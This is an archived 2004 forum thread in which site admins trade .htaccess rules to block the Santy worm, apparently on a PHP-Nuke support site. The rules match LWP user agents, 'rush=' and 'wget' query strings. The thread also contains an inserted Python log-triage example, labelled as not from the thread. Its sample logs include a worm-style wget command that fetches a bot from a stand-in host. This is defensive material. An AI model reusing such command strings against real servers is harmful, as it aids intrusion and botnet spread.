VinDSL
Life Cycles Becoming CPU Cycles


Joined: Jul 11, 2004
Posts: 616
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com

Posted: Sun Dec 26, 2004 6:47 pm

Savent wrote:
Is the santy worm gone now? I haven't heard anything in the news about it, in like a week.

There are three documented (and easily accessible) Santy Worms in the wild right now:
  • Santy.a
  • Santy.b
  • Santy.c
...and more coming every day. The newest variants are using not only Google, but Yahoo/AOL for lookups, and they are attacking ALL .PHP scripts now, not just phpBB. I don't think the Santy Worm, et al, is going away any time soon.
VinDSL
Life Cycles Becoming CPU Cycles

Joined: Jul 11, 2004
Posts: 616
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com

Posted: Sun Dec 26, 2004 7:07 pm

Raven wrote:
We have so many good threads on this, I thought I'd recap...

Good idea!

Here are the directives I'm using now (slight tweak)...
Code:
#Check for Santy Worms and redirect them to a phantom site
#Variant-1
RewriteCond %{HTTP_USER_AGENT} ^LWP                     [NC,OR]
#Variant-2 (REQUEST_URI always begins with "/", so the pattern must not be anchored with ^)
RewriteCond %{REQUEST_URI} visualcoders                 [NC,OR]
#Variant-3
RewriteCond %{QUERY_STRING} rush=([^&]+)                [NC]
RewriteRule ^.*$ http://www.goawayanddontcomeback.com   [L]


I'm redirecting worms away from my site now, to a phantom URI. My 'emailsforyou' page is 10K, and it's getting hammered 'big time'. My thinking is, "Why waste any resources on these worms?" Wink
VinDSL
Life Cycles Becoming CPU Cycles

Joined: Jul 11, 2004
Posts: 616
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com

Posted: Sun Dec 26, 2004 10:01 pm

It's been determined that Santy.c does not have enough similarities with Santy, thus it was renamed from Santy.c/e to PhpInclude.Worm.
Raven
Site Admin/Owner

Joined: Aug 27, 2002
Posts: 15210
Location: Kansas

Posted: Sun Dec 26, 2004 10:03 pm

Great! I can't wait for the next one; can you?
VinDSL
Life Cycles Becoming CPU Cycles

Joined: Jul 11, 2004
Posts: 616
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com

Posted: Sun Dec 26, 2004 10:09 pm

It's been kinda fun, so far! Mr. Green
Raven
Site Admin/Owner

Joined: Aug 27, 2002
Posts: 15210
Location: Kansas

Posted: Sun Dec 26, 2004 10:25 pm

Himmel wrote:
Hehehe.. no problem.. I'm the one who doesn't understand PHP Wink
So, did this fix your problem?
VinDSL
Life Cycles Becoming CPU Cycles

Joined: Jul 11, 2004
Posts: 616
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com

Posted: Mon Dec 27, 2004 12:01 am

You know, I've been playing around with 'this thing' all day, reading the boards, looking at the exploit[s], studying my logs, yada, yada... I had several ideas at the start, but none of them panned out, except for one.

For the life of me, I cannot see any reason to allow 'wget' command strings on my site. The only 'wget' entries in my logs (for the last month) were from Santy worms, and hackers trying to bust into Coppermine Photo Gallery.

I added a 'wget' string directive and ran several exploits against it. It caught them all and redirected.

Code:

#Check for Santy Worms and redirect them to a phantom site
#Variant-1
RewriteCond %{HTTP_USER_AGENT} ^LWP                     [NC,OR]
#Variant-2 (REQUEST_URI always begins with "/", so the pattern must not be anchored with ^)
RewriteCond %{REQUEST_URI} visualcoders                 [NC,OR]
#Variant-3
RewriteCond %{QUERY_STRING} rush=([^&]+)                [NC,OR]
#Variant-4
RewriteCond %{QUERY_STRING} ^(.*)wget(.*)               [NC]
RewriteRule ^.*$ http://www.goawayanddontcomeback.com   [L]



With these Santy worms, the 'wget' process is used to download helper apps such as an IRC client and additional copies of the worm itself to 'own' additional servers. The IRC client meets up with other 'zombie' servers, in a dedicated IRC channel, waiting for orders from the worm's author.

With this in mind, and anticipating additional variants, I didn't see any good reason to allow 'wget' command strings to be run against my Nuke site.

Then again, maybe I'm missing something... Cool
Raven
Site Admin/Owner

Joined: Aug 27, 2002
Posts: 15210
Location: Kansas

Posted: Mon Dec 27, 2004 5:00 am

Try using the file_get_contents() function with and without it. I know there are some backend procedures that use it, at least on my servers.
VinDSL
Life Cycles Becoming CPU Cycles

Joined: Jul 11, 2004
Posts: 616
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com

Posted: Mon Dec 27, 2004 6:50 am

Yep, 'file_get_contents' works just fine. I was looking around your site for something to use for a working example, when I ran across this:

...I decided to have a 'Rolling Rock' instead...
manunkind
Client

Joined: Apr 26, 2004
Posts: 368
Location: Albuquerque, NM

Posted: Mon Dec 27, 2004 9:56 am

I saw PcKiller mentioned and I remembered what it is/was. Is it not part of Sentinel anymore?
Himmel
Regular

Joined: May 08, 2004
Posts: 77

Posted: Mon Dec 27, 2004 10:20 am

Raven wrote:
Himmel wrote:
Hehehe.. no problem.. I'm the one who doesn't understand PHP Wink
So, did this fix your problem?


Yep.. did receive only 2 mails after the fix... much better

Thx Wink
Raven
Site Admin/Owner

Joined: Aug 27, 2002
Posts: 15210
Location: Kansas

Posted: Mon Dec 27, 2004 10:39 am

manunkind wrote:
I saw PcKiller mentioned and I remembered what it is/was. Is it not part of Sentinel anymore?
We decided to make it an 'add-on', if you will. That way you can point to whatever response you want. You can still get it from Ganja's site, although nothing has changed.
CodyG
PHP-Portal Project

Joined: Jan 02, 2003
Posts: 616
Location: Vancouver Island

Posted: Mon Dec 27, 2004 11:46 am

Just wondering ... this applies to the .htaccess in the root nuke directory? ... or should it be applied to the .htaccess in the modules/Forums directory ??
Raven
Site Admin/Owner

Joined: Aug 27, 2002
Posts: 15210
Location: Kansas

Posted: Mon Dec 27, 2004 11:47 am

VinDSL wrote:
Yep, 'file_get_contents' works just fine. I was looking around your site for something to use for a working example, when I ran across this:

...I decided to have a 'Rolling Rock' instead...
wget is used for things like updates to Fantastico and other cPanel things.
Raven
Site Admin/Owner

Joined: Aug 27, 2002
Posts: 15210
Location: Kansas

Posted: Mon Dec 27, 2004 11:49 am

CodyG wrote:
Just wondering ... this applies to the .htaccess in the root nuke directory? ... or should it be applied to the .htaccess in the modules/Forums directory ??
As long as it is in the root, it stops it before it goes anywhere else, unless you override it.
Muffin
Client

Joined: Apr 10, 2004
Posts: 649
Location: UK

Posted: Mon Dec 27, 2004 4:16 pm

If the variants are now going after any php script on a server, can we put this rewrite code in the htaccess file in our root folder (if nuke is in a sub folder) and do we need to change permissions on the htaccess in this case to 666 or leave as is 644?

I already have this in my public_html root htaccess file tho, so do I replace this with the new code or what?

Quote:
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://mydomain.com/.*$ [NC]
RewriteCond %{HTTP_REFERER} !^http://mydomain.com$ [NC]
RewriteCond %{HTTP_REFERER} !^http://www.mydomain.com/.*$ [NC]
RewriteCond %{HTTP_REFERER} !^http://www.mydomain.com$ [NC]
RewriteCond %{HTTP_REFERER} !^http://www.myotherdomain.co.uk/.*$ [NC]
RewriteCond %{HTTP_REFERER} !^http://www.myotherdomain.co.uk$ [NC]
RewriteRule .*\.(jpg|jpeg|gif|png|bmp)$
Only registered users can see links on this board!
Get registered or login to the forums!
[R,NC]


Or put the code maybe in any php root application folder htaccess file?

My nuke site's not in my root folder, but I have the code in my nuke root folder, so I'm not getting any problems with it from there.
VinDSL
Life Cycles Becoming CPU Cycles

Joined: Jul 11, 2004
Posts: 616
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com

Posted: Mon Dec 27, 2004 6:28 pm

Raven wrote:
wget is used for things like updates to Fantastico and other cPanel things.

Agreed! Wink

Now that the immediacy of the situation is over, I think it's time to start with the caveats...

Code:
#Place these directives at the TOP of your .htaccess file!
#Check for Santy Worms and redirect them to a PHANTOM site.
#Variant-1 May cause problems with CRON jobs set from cPanel.
RewriteCond %{HTTP_USER_AGENT} ^LWP                     [NC,OR]
#Variant-2 No reported problems.
#(REQUEST_URI always begins with "/", so the pattern must not be anchored with ^)
RewriteCond %{REQUEST_URI} visualcoders                 [NC,OR]
#Variant-3 No reported problems.
RewriteCond %{QUERY_STRING} rush=([^&]+)                [NC,OR]
#Variant-4 May cause problems with cPanel updates, et cetera.
RewriteCond %{QUERY_STRING} ^(.*)wget(.*)               [NC]
#Redirect - Send worms packing, but NOT to a real web site!
RewriteRule ^.*$ http://www.goawayanddontcomeback.com   [L]
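To see what these directives actually catch, and where Variant-1 and Variant-4 bite legitimate traffic, here is an added Python example that is not from the thread or from any of its posters: it transcribes the four RewriteCond patterns into regexes and runs them over a few constructed Apache combined-format log lines (fake addresses and hostnames). The log format, the field names and the sample requests are assumptions of the example, not anything taken from a real server.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Added example, not code from the thread: the four RewriteCond patterns from
# the .htaccess directives above, transcribed into Python so they can be run
# over access-log lines offline. Apache's [NC] flag becomes re.IGNORECASE and
# the [OR] chain becomes "any condition matches".
RULES = {
    "Variant-1 LWP user agent":  ("user_agent", re.compile(r"^LWP", re.I)),
    "Variant-2 visualcoders":    ("path",       re.compile(r"visualcoders", re.I)),
    "Variant-3 rush= parameter": ("query",      re.compile(r"rush=([^&]+)", re.I)),
    "Variant-4 wget in query":   ("query",      re.compile(r"wget", re.I)),
}

# Apache "combined" log format (an assumption; adjust for other LogFormats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


@dataclass
class Request:
    ip: str
    path: str        # what mod_rewrite exposes as %{REQUEST_URI}
    query: str       # %{QUERY_STRING}
    user_agent: str  # %{HTTP_USER_AGENT}


def parse_line(line: str):
    """Split one combined-format log line into the fields the rules inspect."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    target = urlsplit(m.group("target"))
    return Request(m.group("ip"), target.path, target.query, m.group("ua"))


def matched_rules(req: Request) -> list:
    """Return the names of every rule that would have fired for this request."""
    return [name for name, (field, rx) in RULES.items()
            if rx.search(getattr(req, field))]


def anchored_path_rule_matches(path: str) -> bool:
    """Show why '^visualcoders' against %{REQUEST_URI} can never fire:
    REQUEST_URI always begins with '/', so an anchored match fails."""
    return re.search(r"^visualcoders", path, re.I) is not None


def triage(lines):
    """Map each parseable log line to (client ip, names of rules that fired)."""
    out = []
    for line in lines:
        req = parse_line(line)
        if req is not None:
            out.append((req.ip, matched_rules(req)))
    return out


# Constructed sample lines (documentation-range addresses, made-up hosts).
SAMPLE_LOG = [
    # Worm-style probe: LWP user agent plus the rush= parameter
    '203.0.113.7 - - [27/Dec/2004:01:02:03 -0700] "GET /modules.php?name=Forums&file=viewtopic&rush=echo%20_start_ HTTP/1.1" 200 512 "-" "LWP::Simple/5.79"',
    # Command string carrying wget inside the query string
    '203.0.113.8 - - [27/Dec/2004:01:05:44 -0700] "GET /index.php?page=http://bad.example/cmd.txt?cmd=wget%20http://bad.example/bot HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    # Legitimate cron job fetching a page with an LWP user agent: Variant-1 false positive
    '192.0.2.10 - - [27/Dec/2004:02:00:00 -0700] "GET /cron.php HTTP/1.1" 200 128 "-" "lwp-request/2.06"',
    # Ordinary visitor
    '198.51.100.5 - - [27/Dec/2004:02:10:31 -0700] "GET /modules.php?name=News HTTP/1.1" 200 9182 "http://www.example.com/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, hits in triage(SAMPLE_LOG):
        print(ip, "->", hits or "allowed")
```

Running it prints one line per request. The cron line with an lwp-request user agent is caught by Variant-1 exactly as the caveat in the directives warns, which is the kind of false positive to look for in your own logs before turning the redirect on. The anchored_path_rule_matches helper shows why `^visualcoders` against `%{REQUEST_URI}` never fires: that variable always begins with `/`.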
Raven
Site Admin/Owner

Joined: Aug 27, 2002
Posts: 15210
Location: Kansas

Posted: Mon Dec 27, 2004 7:26 pm

I chose another way ..... renamed wget.
VinDSL
Life Cycles Becoming CPU Cycles

Joined: Jul 11, 2004
Posts: 616
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com

Posted: Mon Dec 27, 2004 8:49 pm

Raven wrote:
I chose another way ..... renamed wget.

Yeah, this is all kinda iffy. Mileage may vary, depending on conditions. That's the nature of these things!

I think most Nuke sites are on shared servers, and ppl simply want to keep the worms away. CRON isn't in their vocabulary, and cPanel is updated by their web host.

I run my production site on a shared server because that's where the 'rubber meets the road', so to speak. I run 'personal' web sites, out of my living room, on a Slackware box that hasn't been touched in 2 years. I've run BSD, WiNNT IIS, and Redhat in the past. I'm currently embroiled in a VPS beta program that gives users root control over WHM/cPanel/Fedora. It shows great promise!

All of these situations would allow and even require different solutions, but I truly feel that the quick 'n' dirty fix, listed above, will work fine for most ppl in a shared server environment.

I wouldn't recommend something like this unless I was running it on my own production site, but then again, it probably isn't for everybody. That's certainly a given... Wink
Raven
Site Admin/Owner

Joined: Aug 27, 2002
Posts: 15210
Location: Kansas

Posted: Mon Dec 27, 2004 10:08 pm

I'm afraid it's getting to the point where our solutions will start limiting our exposure to both good and evil. It will be interesting to see what 2005 will bring in as far as viruses and exploits. But, y'all can rest assured that we will be vigilant and hopefully, timely!
sixonetonoffun
Spouse Contemplates Divorce

Joined: Jan 02, 2003
Posts: 2363

Posted: Mon Dec 27, 2004 10:20 pm

2005 the year of the WoRm? Well, the examples are out there and they are ridiculously simple. It's going to be business as usual around here, I think...
TheosEleos
Moderator

Joined: Sep 18, 2003
Posts: 958
Location: Missouri

Posted: Tue Dec 28, 2004 10:54 pm

Here is what I have in my .htaccess...

Code:
#Check for Santy Worms and redirect them to a fake page
#Variant -1
RewriteCond %{HTTP_USER_AGENT} ^LWP                     [NC,OR]
#Variant -2 (REQUEST_URI always begins with "/", so the pattern must not be anchored with ^)
RewriteCond %{REQUEST_URI} visualcoders                 [NC,OR]
#Variant -3
RewriteCond %{QUERY_STRING} rush=([^&]+)                [NC]
RewriteRule ^.*$
Only registered users can see links on this board!
Get registered or login to the forums!
[L]


I'm a little lost though because I am looking at my error logs and there are a bunch that say this...
Quote:

[Tue Dec 28 16:00:02 2004] [error] [client 65.254.38.234] File does not exist: /home/blablabla/public_html/phenylshouse/www.uglypeople.com
Raven
Site Admin/Owner

Joined: Aug 27, 2002
Posts: 15210
Location: Kansas

Posted: Tue Dec 28, 2004 10:56 pm

You need
Only registered users can see links on this board!
Get registered or login to the forums!
TheosEleos
Moderator

Joined: Sep 18, 2003
Posts: 958
Location: Missouri

Posted: Tue Dec 28, 2004 11:11 pm

Ahhh, thank you.

I must have done this thing just in time. My log is full of these errors. Probably 40 or so. I never got one ban from Sentinel. I guess I set up htaccess right before the attacks started on my site.
TheosEleos
Moderator

Joined: Sep 18, 2003
Posts: 958
Location: Missouri

Posted: Tue Dec 28, 2004 11:17 pm

I don't know what I am talking about, because SamSpade says that IP is my DNS or something...